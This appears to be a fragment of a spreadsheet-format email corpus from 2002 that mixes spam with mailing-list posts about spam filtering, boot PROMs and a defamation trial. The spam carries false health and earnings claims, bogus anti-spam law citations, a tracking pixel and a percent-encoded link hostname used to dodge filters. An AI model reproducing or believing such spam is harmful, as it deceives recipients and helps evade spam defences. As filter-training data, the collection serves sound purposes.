 #    3 Vivid DVDs Absolutely FREE!!!       #
 #                                          #
 ############################################
 &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;NO PURCHASE NECESSARY! &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
 If you haven't seen it yet... we are offering a
 new weekly selection absolutely FREE Adult DVDs
 AND VIDEOS NO PURCHASE NECESSARY!!!!!
  GO TO: http://209.203.162.20/8230/
 Everything must go!!! Additional Titles as
 low as $6.97
 &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;NO PURCHASE NECESSARY! &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
 ############################################
 #                                          #
 #  Don't forget to forward this email to   #
 #  all your friends for the same deal...   #
 #  There is a new free DVD and VHS video   #
 #  available every week for your viewing   #
 #  pleasure.                               #
 #                                          #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http://209.203.162.20/optout.html 
 . Please allow 24 hours for removal.
 This e-mail is sent in compliance with the Information Exchange Promotion 
 and Privacy Protection Act. section 50 marked as 'Advertisement' with valid 
 'removal' instruction.
 flblngvdydqtyinmtdhgqenainecyhixfrey
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [scoop] BiLiYORUZ REKLAMA iHTiYACINIZ VAR! BUNUN iCiN BURADAYIZ.. 24.07.2002 15:57:41
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Razor Agents 2.14 Released
</t>
  </si>
  <si>
    <t xml:space="preserve">
 This is a stable beta release.  Please to upgrade.
 http://prdownloads.sourceforge.net/razor/razor-agents-2.14.tar.gz?download
 I've listed below all changes since the last major release, 2.12.
 These are also in the Changes file included with the tar.gz.
 -chad
 2.14 (July 25, 2002)
       Added Digest::Nilsimsa and URI::Escape to Make-
        file.PL's prerequisites.  [vipul]
       Fixed rare bug in report.  Thanks goes to "Alan A."
        &lt;alan@naisp.net&gt; for this and much more help.  [chad]
 2.126 (July 24, 2002)
       Improved logic again for detecting spam.  [chad,
        vipul]
       Run-time warnings are disabled unless in debug mode.
        [chad]
 2.125 (July 18, 2002)
       Improved logic for detecting spam, now we only look at
        visible and/or significant mime parts.  [chad, vipul]
       Mime parts cleaned to only whitespace are now ignored
        on the client side, that is, they are not checked
        against server [chad]
       Fixed bug in report (err 202) [chad]
       Quieted more warnings [chad]
 2.123 (July 17, 2002)
       Fixed bug in revoke/report [chad]
       Whitelist now looks at all 'Received:' headers for
        matching [chad]
       Added debuglevel, whitelist cmd-line options [chad]
       Quieted more warnings [chad]
 2.122 (July 15, 2002)
       Renamed razor-register razor-admin. To register, you
        must 'razor-admin -register' [chad]
       Cleanded up how we store mail parts.  Each mail object
        now has a part object that stores info relevant to
        that part.  [chad]
       Fixed parse_mbox (reading mbox and rfc822 mails)
        [chad]
       Backup any existing identity files before writing over
        them (with new identity) [chad]
       Added lock file support, so only one process writes to
        servers.*.lst at a time [chad]
       Added rediscover_wait_dns [chad]
       Fixed a bug when we rediscover, we save info to list
        correctly but when using it we skip the first server
        [chad]
       Fixed whitelist so rule 'from xx' only matches 'From:
        .*xx' not 'From .*xx' (Note the ':') [chad]
       Made exit codes cleaner [chad]
         0 or 1       =&gt; no error
         2 or greater =&gt; error
       Fixed error msg/exit code after disconnect [chad]
       Added -w to razor binaries [chad]
       If authen fails 'cuz unknown user (213), attempt re-
        register [chad]
       Quieted a bunch of warnings [chad]
 -------------------------------------------------------
 This sf.net email is sponsored by: Jabber - The world's fastest growing 
 real-time communications platform! Don't just IM. Build it in! 
 http://www.jabber.com/osdn/xim
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: spam maps
</t>
  </si>
  <si>
    <t xml:space="preserve">Did someone invert the spam filters? I'm getting almost nothing but spam on
 fork now...
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: NY Times: "Google's automated editors appeared to match the work
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:8:05:13AM
 Date: Tue, 24 Sep 2002 15:05:13 GMT
 NY Times[1]: "Google's automated editors appeared to match the work of human 
 competitors."
 [1] http://www.nytimes.com/2002/09/24/technology/24GOOG.html?ex=1033444800&amp;en=0557fe246dd68b12&amp;ei=5007&amp;partner=USERLAND
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Medieval powers in City trial of strength
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8572788,215/
 Date: 2002-10-05T03:05:32+01:00
 *Society:* Law lords to hear challenge to bill giving big money an even bigger 
 say.
</t>
  </si>
  <si>
    <t xml:space="preserve">At 13:30 06/08/2002, John P. Looney wrote:
 &gt;On Tue, Aug 06, 2002 at 01:22:07PM +0100, Anders Holm mentioned:
 &gt; &gt; &gt; Heh, how hard would it be to get a PC with an OpenBoot prom ?
 &gt; &gt;
 &gt; &gt; You could burn a PROM yourself, if you'd wish. I believe that the netboot
 &gt; &gt; project would have a PROM you could download and burn, having the needed
 &gt; &gt; h/w of course.. ;)
 &gt;
 &gt;  But the PROMs are for specific network cards, and all their are really is
 &gt;a bootp/tftp client. Not the whole set of nice bits &amp; pieces you get with
 &gt;an OpenBoot PROM.
 True, but would still enable you to do a network install without using boot 
 floppies. Then again, boot floppies are cheaper, and easier to recreate 
 when you'd like to do some changes to it. Gets messier when you'd have a 
 boot image on a server, and the only way you can test it is to boot it over 
 the network. In any case, it's just one option available.
 &gt;  AMD were talking of supporting it ages back, when the Athlon was looking
 &gt;like it would just be on workstations from day one. They seemed to drop
 &gt;it, and go for the crappy MSDOS compatible BIOS though.
 Too bad they didn't go with that then. Would have been so much nicer than 
 the old MSDOS crap. I do like the OpenBoot idea actually. Especially being 
 able to set the PROM to boot from whatever disk slice you'd want. No need 
 to set that in lilo/grub any more in that case, since the OpenBoot rom 
 takes care of that part for you. Then again, you wouldn't get a menu that 
 allows you to choose what you want to boot. There's good and bad, all 
 depending on what you want to do, I suppose. Sitting here and typing I'm 
 realising that it is both a nice thing, and a nasty thing..
 Ah well, life sucks as well, some say.. ;)
 //Anders//
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: If You Dont... Your Competition Will!              7377
</t>
  </si>
  <si>
    <t xml:space="preserve">Freedombuilder Advertising Services can put your product or service instantly 
 into the hands of millions of prospects!
 "Many business people are finding out that they can now advertise 
 in ways that they never could have afforded in the past. The cost 
 of sending mass e-mail is extremely low, and the response rate is 
 high and quick." 
 - USA TODAY
 " Sanford Wallace says he has made over a Million dollars using bulk email"
 - WALL STREET JOURNAL
 ~~~~~~~~~~~~~~~~~~~~
 Since 1998, Freedombuilder Advertising Services has provided bulk email marketing 
 to thousands of well-satisfied customers. We offer the most competitive prices in the 
 industry, made possible by our high percentage of repeat business. We have the 
 most advanced direct email technology employed by only a knowledgeable few 
 in the world.
 We have over 260 million active email addresses, increasing our list at the rate of 
 30-50 million per month. You will have instant guaranteed results, something no other 
 form of marketing can claim. Our turn around time is a remarkable 24 hours.
 Our email addresses are sorted, cleaned, and filtered for a very profitable 
 marketing campaign. 
 We guarantee the lowest prices with a proven track record.
 Best of ALL, Freedombuilder Advertising Services can be used as a 
 100% TAX WRITE OFF for your Business!
 1) Let's say you... Sell a $24.95 PRODUCT or SERVICE.
 2) Let's say you... Mass Email to 1,000,000 PEOPLE DAILY.
 3) Let's say you... Receive JUST 1 ORDER for EVERY 2,500 EMAILS.
 CALCULATION OF YOUR EARNINGS BASED ON THE ABOVE STATISTICS:
 [Day 1]: $9,980 [Week 1]: $69,860 [Month 1]: $279,440
 Now you can see how bulk email advertising works, and how 
 Freedombuilder Advertising Services can help YOU...!
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Our Prices List:
 200,000 emails: $100
 1,000,000 emails $300
 2,000,000 emails $400
 3,000,000 emails $500
 4,000,000 emails $600
 5,000,000 emails $700
 10,000,000 emails $1250
 OVER 10 Million - Please inquire
 Prices above are for 100% DELIVERED
 Emails, with your message and subject line.
 Please include this information with your order for faster service!
 -------------------------------------------------------------------------------------------------------------------
 Name: _______________________________
 Address:______________________________
 Phone Number:_________________________
 E Mail Address:_________________________
 "finished, ready to be sent ad", on a 3.5 floppy disk.
 Payable by: US Cash, Certified Cheque, or International Money 
 Order to:
 Freedom Builder Advertising Services
 Suite 2058 #3, 9899 112th Avenue
 Grande Prairie, AB, Canada
 T8V-7T2
 -----------------------------------------------------------------------------------------------------------------------
 For order inquiries or extended information please call or email us:
 Voice/Fax-253-660-3853 (Limited to 30 secs)
 Customer Service (780) 513-2166
 Email: freedombuilder@btamail.net.cn
 Best Regards, And Have A Blessed Day!
 Freedombuilder Advertising Services
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Under Bill s.1618 TITLE III passed by the 105th U.S. Congress this letter 
 is not considered "spam" as long as we include: 1) contact information and, 
 2) the way to be removed from future mailings.
 If this email has reached you in error or you wish to be removed from our 
 mailing list please send your "remove request" to: 432rfe3@eudoramail.com
 We honor all remove requests.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Internet Defamation Suit Ends With Defense Verdict
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --- begin forwarded text
 To: rah@philodox.com
 Subject: Internet Defamation Suit Ends With Defense Verdict
 Date: Mon,  5 Aug 2002 10:08:41 -0400 (EDT)
 From: Somebody
 Internet Defamation Suit Ends With Defense Verdict
 http://www.law.com/servlet/ContentServer?pagename=OpenMarket/Xcelerate/View&amp;c=LawArticle&amp;cid=1028320303259&amp;t=LawArticleTech
 John Council
 Texas Lawyer 08-05-2002
 In one of the first trials in the country to
 address Internet defamation, a Dallas County,
 Texas, jury last week rejected a $700 million
 suit by an Internet company that claimed it
 was harmed by negative electronic messages
 posted by an employee of a competing company.
 ZixIt, a Dallas Internet company, filed ZixIt
 Corp. v. Visa International, et al. in 1999,
 alleging it was harmed by Paul Guthrie, then
 a vice president with Visa. ZixIt alleged in
 its suit that Guthrie posted more than 400
 anonymous messages, many of them negative,
 about ZixIt on the Yahoo Finance ZixIt Internet
 message board, causing ZixIt's stock price to
 drop.
 The suit also alleged that the postings
 destroyed the company's ability to market
 its ZixCharge Internet transaction
 authorization system, which allows consumers
 to make purchases without revealing their
 credit card numbers to merchants. Visa has
 a similar Internet payment system.
 ZixIt alleged that the postings caused its
 stock price to plummet. Had the product
 been successful, the company believed it
 would have been worth more than $1 billion,
 according to lawyers involved in the case.
 On July 31, a jury in Judge Merrill Hartman's
 192nd District Court found that ZixIt's
 product was not harmed by the postings.
 Neal Manne and Kenneth McNeil, lawyers from
 Houston's Susman Godfrey who represented
 ZixIt at trial, did not return calls for
 comment by press time.
 "The company hasn't made any decision about
 an appeal," says Cindy Lawrence, a ZixIt
 spokeswoman. "The outcome of the lawsuit
 doesn't have any effect on our future
 products and services in e-messaging."
 GETTING GRADED
 Visa's lawyers alleged that Guthrie acted on
 his own and had a right to free speech, and
 that Guthrie's Internet postings had no
 effect on ZixIt's stock. Guthrie has since
 left Visa, lawyers for the company say.
 Guthrie was not a defendant in the case.
 However, his interests in the case were
 represented by Todd Noonan, an attorney in
 Sacramento, Calif.'s Stevens &amp; O'Connell.
 Noonan was recovering from surgery last
 week and was unavailable for comment.
 "I think people believe whether you
 succeed or fail [is] because of what you
 do and not what other people do to you.
 Internet companies didn't succeed for all
 sorts of reasons," says Jeff Tillotson, a
 partner in Dallas' Lynn, Tillotson &amp; Pinker,
 who defended Visa at trial.
 ZixIt's case was a hard sell to the jury,
 especially with the reality of the economy,
 Tillotson says.
 "Everyone knows that the stock market
 has fallen and the trouble with Internet
 companies. I think the jury took that into
 account," Tillotson says.
 There were lessons to be learned from the
 Internet defamation trial, says Mike Lynn,
 who also represented Visa at trial. Even
 though message boards are considered a
 protected form of free speech, that freedom
 won't prevent a company from being dragged
 into court if its employee blasts another
 company on the Internet, Lynn says.
 "A company can be responsible for what an
 employee posts on a message board," Lynn
 says. "The courts have said you're entitled
 to go to a jury to determine whether there
 are damages as a result of that. The law is
 very odd, not mature, [and] damage theories
 are not mature."
 The nature of the case also added an
 interesting twist to the trial, Tillotson
 says. Many of those who posted messages on
 the board attended the trial and posted
 comments about the daily proceedings
 throughout the three-week trial, he says.
 "It was apparent to everyone that many of
 the people who posted on these message boards
 were watching the trial," Tillotson says.
 "It really was wild. The lawyers felt like
 they were being graded."
 --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</si>
  <si>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Subject: UBID Auction Alert
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;CNET Announcement&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee"&gt;
 &lt;center&gt;
 &lt;!-- header --&gt;
 &lt;table width="624" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/i/nl/ann/hd.gif" alt="CNET Announce" width="442" height="60"&gt;&lt;/td&gt;
 &lt;td&gt;&lt;img src="http://www.cnet.com/i/nl/ann/rt.gif" width="184" height="60"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="624" bgcolor="#000000" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width="10" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="10"&gt;&lt;/td&gt;
 &lt;td width="9" bgcolor="#ffcc00"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1"&gt;&lt;/td&gt;
 &lt;td width="624" bgcolor="#ffcc00"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td bgcolor="#ffcc00"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td colspan="2"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /header --&gt;
 &lt;!-- content --&gt;
 &lt;table width="624" bgcolor="#000000" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="9" bgcolor="#ffcc00"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1"&gt;&lt;/td&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="624" bgcolor="#ffffff"&gt;&lt;img src="/b.gif" width="1" height="8"&gt;&lt;br&gt;&lt;div align="center"&gt;&lt;img src="http://home.cnet.com/Ads/Media/Images/ad10-dk.gif" width="120" height="10"&gt;&lt;/div&gt;&lt;/td&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="624" bgcolor="#000000" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="9" bgcolor="#ffcc00"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1"&gt;&lt;/td&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="624" bgcolor="#ffffff"&gt;&lt;font face="verdana, geneva" size="-2" color="#333333"&gt;&amp;nbsp;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;!-- date --&gt;
 July 26, 2002
 &lt;!-- /date --&gt;
 &lt;/font&gt;&lt;br&gt;
 &lt;!-- ### promo content ### --&gt;
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;uBid.com&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#0099ff" marginheight="10" marginwidth="0" topmargin="10" leftmargin="0"&gt;
 &lt;center&gt;
 &lt;table width="500" cellpadding="5" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td bgcolor="#0099ff"&gt;
 &lt;table width="490" cellpadding="0" cellspacing="0" border="0"&gt;
 	&lt;tr&gt;
 		&lt;td colspan="3" bgcolor="#ffffff"&gt;&lt;img src="http://image.atdmt.com/ds/AAAVEUBIDUBD/http://image.atdmt.com/ds/AAAVEUBIDUBD/clear_dot.gif" width="490" height="5" alt="" border="0"&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td bgcolor="#ffffff" width="5"&gt;&lt;img src="http://image.atdmt.com/ds/AAAVEUBIDUBD/clear_dot.gif" width="5" height="1" alt="" border="0"&gt;&lt;/td&gt;
 		&lt;td bgcolor="#ffffff" width="480"&gt;
 		&lt;table width="480" border="0" cellpadding="0" cellspacing="0"&gt;
 			&lt;tr&gt;
 				&lt;td&gt;&lt;a href="http://cgi.zdnet.com/slink?183537"&gt;&lt;img src="http://image.atdmt.com/ds/AAAVEUBIDUBD/header.gif" width="480" height="85" alt="uBid.com-Where you win at paying less!" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 			&lt;/tr&gt;
 			&lt;tr&gt;
 				&lt;td&gt;&lt;a href="http://cgi.zdnet.com/slink?183537"&gt;&lt;img src="http://image.atdmt.com/ds/AAAVEUBIDUBD/products_1.gif" width="480" height="50" alt="uBid.com-Where you win at paying less!" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 			&lt;/tr&gt;
 			&lt;tr&gt;
 				&lt;td&gt;&lt;a href="http://cgi.zdnet.com/slink?183537"&gt;&lt;img src="http://image.atdmt.com/ds/AAAVEUBIDUBD/products_2.gif" width="480" height="50" alt="uBid.com-Where you win at paying less!" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 			&lt;/tr&gt;
 			&lt;tr&gt;
 				&lt;td&gt;&lt;a href="http://cgi.zdnet.com/slink?183537"&gt;&lt;img src="http://image.atdmt.com/ds/AAAVEUBIDUBD/products_3.gif" width="480" height="50" alt="uBid.com-Where you win at paying less!" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 			&lt;/tr&gt;
 			&lt;tr&gt;
 				&lt;td&gt;&lt;a href="http://cgi.zdnet.com/slink?183537"&gt;&lt;img src="http://image.atdmt.com/ds/AAAVEUBIDUBD/products_4.gif" width="480" height="50" alt="uBid.com-Where you win at paying less!" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 			&lt;/tr&gt;
 			&lt;tr&gt;
 				&lt;td&gt;&lt;a href="http://cgi.zdnet.com/slink?183537"&gt;&lt;img src="http://image.atdmt.com/ds/AAAVEUBIDUBD/clear_dot.gif" width="480" height="5" alt="" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 			&lt;/tr&gt;
 			&lt;tr&gt;
 				&lt;td&gt;
 &lt;p&gt;&lt;font face="arial" size="2" color="#003399"&gt;&lt;a href="http://cgi.zdnet.com/slink?183537"&gt;&lt;b&gt;uBid&lt;/b&gt;&lt;/a&gt;  helps you save more on your technology purchases.  Name your own price auction format lets you buy below wholesale.  Our service and prices have provided value to close to one million customers.  Thousands of new items go up for sale each day, so there's always new merchandise to bid on.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="arial" size="2" color="#003399"&gt;Visit &lt;a href="http://cgi.zdnet.com/slink?183537"&gt;&lt;b&gt;uBid&lt;/b&gt;&lt;/a&gt; today and put in a bid on that item you've been shopping for.&lt;/font&gt;&lt;/p&gt;
 &lt;br&gt;
 				&lt;/td&gt;
 			&lt;/tr&gt;
 			&lt;tr&gt;
 				&lt;td align="center"&gt;&lt;a href="http://cgi.zdnet.com/slink?183537"&gt;&lt;img src="http://image.atdmt.com/ds/AAAVEUBIDUBD/ubid_logo.gif" width="92" height="40" alt="uBid.com-Where you win at paying less!" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 			&lt;/tr&gt;
 			&lt;tr&gt;
 				&lt;td&gt;&lt;img src="http://image.atdmt.com/ds/AAAVEUBIDUBD/clear_dot.gif" width="480" height="5" alt="" border="0"&gt;&lt;/td&gt;
 			&lt;/tr&gt;
 		&lt;/table&gt;
 		&lt;/td&gt;
 		&lt;td bgcolor="#ffffff" width="5"&gt;&lt;img src="http://image.atdmt.com/ds/AAAVEUBIDUBD/img/clear_dot.gif" width="5" height="1" alt="" border="0"&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt;		
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;!-- ### /promo content ### --&gt;
 &lt;/td&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### footer ### --&gt;
 &lt;table width="624"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width="624"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href='http://nl.com.com/servlet/url_login?email=sdfs@fsg.com'&gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;sdfs@fsg.com&lt;p&gt;
 &lt;A NOTRACK HREF="http://clickthru.online.com/Click?q=5b-5L3wzNKWZUeFYLNuRjK9DYwbMzCtQsRR"&gt;Unsubscribe&lt;/A&gt;&amp;nbsp|&amp;nbsp&lt;a href='http://nl.com.com/servlet/url_login?email=sdfs@fsg.com'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://www.cnet.com/subscription/0-16335-7-6770019.html"&gt;FAQ&lt;/A&gt;
 &amp;nbsp|&amp;nbsp&lt;a href="http://www.cnet.com/aboutcnet/0-13618.html?tag=ft"&gt;Advertise&lt;/A&gt;&lt;br&gt;&lt;/font&gt;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width="624"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width="624" bgcolor="#ffcc00" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td width="1" bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width="10" height="1"&gt;&lt;/td&gt;
 &lt;td width="37"&gt;&lt;a href="http://www.cnet.com/frontdoor/0-1.html"&gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://shopper.cnet.com/shopping/0-1257.html"&gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; | 
 &lt;a href="http://computers.cnet.com/hardware/0-1016.html"&gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; | 
 &lt;a href="http://news.cnet.com/"&gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://download.cnet.com/downloads/0-10000.html"&gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; | 
 &lt;a href="http://www.cnet.com/sitemap/0-2253447.html"&gt;&lt;font color="#000000"&gt;All CNET services&lt;/font&gt;&lt;/a&gt;
 &lt;/font&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="624" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td height="25"&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;tr:ad name="copyright"/&gt;
 &lt;/a&gt;.&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=70-3vdJn9pCyGeVgo8Lns55s_HQUdRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Lowest mortgage loan rates                     VKP
</t>
  </si>
  <si>
    <t xml:space="preserve">Commentary
 It is time to refinance!
 Your credit does not matter, we can approve anyone.
 Now is the time to let some of the top mortgage companies 
 in the country compete for your business. 
 If you have good credit we will give you the most amazing 
 rates available anywhere! 
 If you have poor credit, don't worry! We can still refinance 
 you with the most competitive rates in the industry!
 Let Us put Our Expertise to Work for You!
 http://64.21.33.238/74205/
 Or site 2
 http://64.21.33.238/74206/
 Erase
 http://64.21.33.238/optout.htm
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Call me                    08568
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: It will be too late soon... hmlpy
</t>
  </si>
  <si>
    <t xml:space="preserve">WAKE UP!
 Here's the deal: Mortgage interest rates are DOWN right NOW, but with the economy improving it is only a matter of time before they go UP again!
 If you are thinking about refinancing, PLEASE do not hesitate - find out what kind of GREAT deal you may qualify for RIGHT NOW! There is no time like the present!
 Get a FREE, NO OBLIGATION quote to find out how much you could save every month. You could be NEEDLESSLY throwing away money every month. Don't you have better things to do with your money?
  http://first.topdrawerbiz.com/home/
 It sure won't hurt to find out.
 *******************************************
 To unsubscribe, click below:
 http://211.78.96.242/removal/remove.htm
 Allow 72 hours for removal.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 22 Jul 2002 the voices made Olivier Nicole write:
 &gt; &gt;How would forgeries (e.g. viruses) be detected?  Would there be an
 &gt; &gt;"oops-I-didn't-mean-to-submit-that" option somehow?
 &gt;
 &gt; Real viruses are filtered before they reach any mailbox for delivery.
 &gt;
 &gt; Tose two addresses could be accessible only for internal mail.
 &gt;
 &gt; And as a user is using this mechanism to build his own database of
 &gt; spam/non-spam, that's his problem is he sumbit something wrong.
 &gt;
 &gt; BTW, same forgery or wrong submission problems would exist if each
 &gt; user had his own set of 2 addresses.
  Not really, because you could use [user]-[action]-[passw]@domain.tld; instead
 of letting 100'000 other users mess with your settings; not to mention virii
 that randomly pick sendernames from addressbooks and the future virii that
 target these "not spam"-functions...
 	/Tony
 -- 
 # Per scientiam ad libertatem! // Through knowledge towards freedom! #
 # Genom kunskap mot frihet! =*= (c) 1999-2002 tony@svanstrom.com =*= #
     perl -e'print$_{$_} for sort%_=`lynx -source svanstrom.com/t`'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</si>
  <si>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FREE HGH - Look 10 Years Younger in 3 Weeks!!!     HMUPRZD
</t>
  </si>
  <si>
    <t xml:space="preserve">FREE 30 day supply of HGH 1000:
 Look Younger and Lose Weight in 3 Weeks!!!!
 As seen on NBC, CBS, CNN, and Oprah! The health discovery 
 that actually reverses aging while burning fat, without
 dieting or exercise! This proven discovery has been reported
 on by the New England Journal of Medicine. Forget aging and
 dieting forever!  And it's Guaranteed!
 http://w%77%77%2e%74%65%72%72%61%2ee%73/pe%72%73o%6E%61%6C9/starfish103/
 Would you like to lose weight while you sleep?
                      No dieting!
                   No hunger pains!
                     No Cravings!
                No strenuous exercise!
               Change your life forever! 
                    100% GUARANTEED
 http://w%77%77%2e%74%65%72%72%61%2ee%73/pe%72%73o%6E%61%6C9/starfish103/
 AOL Users click
 &lt;A HREF="http://w%77%77%2e%74%65%72%72%61%2ee%73/pe%72%73o%6E%61%6C9/starfish103/"&gt; HERE&lt;/A&gt;
 To be removed, reply to this email with REMOVE in the SUBJECT line.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hello !                                                                            8688sl-6
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00B6_53D62C4C.C4267A64
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 SGVsbG8gIQ0KDQoNCg0KDQoNCg0KDQoNCg0KPT09PT09PT09PT09PT09PT09
 PT09PT09PT09PT09PT09PT09PT09PT0NCkludmVzdG1lbnQgaW4gdGVjaG5v
 bG9neSB0aGF0IHdpbGwgbWFrZSB5b3UgbW9uZXkuDQo9PT09PT09PT09PT09
 PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KIA0KQVMgU0VFTiBPTiBO
 QVRJT05BTCBUVjoNCiANCk1ha2luZyBvdmVyIGhhbGYgbWlsbGlvbiBkb2xs
 YXJzIGV2ZXJ5IDQgdG8gNSBtb250aHMgZnJvbSB5b3VyIGhvbWU/IEEgb25l
